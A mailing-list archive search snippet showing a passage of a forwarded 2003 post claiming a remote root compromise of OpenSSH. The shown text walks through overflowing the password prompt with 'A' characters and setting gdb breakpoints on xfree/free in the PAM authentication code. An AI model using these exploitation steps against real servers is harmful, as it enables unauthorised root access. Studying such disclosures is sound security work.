Displaying 1 result from an estimated 1 matches for "0x080531bd".
2003 Jan 08
2
OPENSSH REMOTE ROOT COMPROMISE ALL VERSIONS (fwd)
...h werewolf.research.mmhs.com
Password: <type a thousand 'A' characters here and hit enter>
After that, the xfree() breakpoint is reached, and the next call to
free() should therefore be intercepted in order to comply with the
technique developed by Global InterSec LLC:
Breakpoint 1, 0x080531bd in input_userauth_info_response_pam (type=61,
seqnr=7, ctxt=0x809c050) at auth2-pam.c:158
158 xfree(resp);
(gdb) disassemble xfree
[...]
0x807308e <xfree+34>: call 0x804ba14 <free>
[...]
(gdb) break *0x807308e
Breakpoint 2 at 0x807308e: file xmalloc.c, line 5...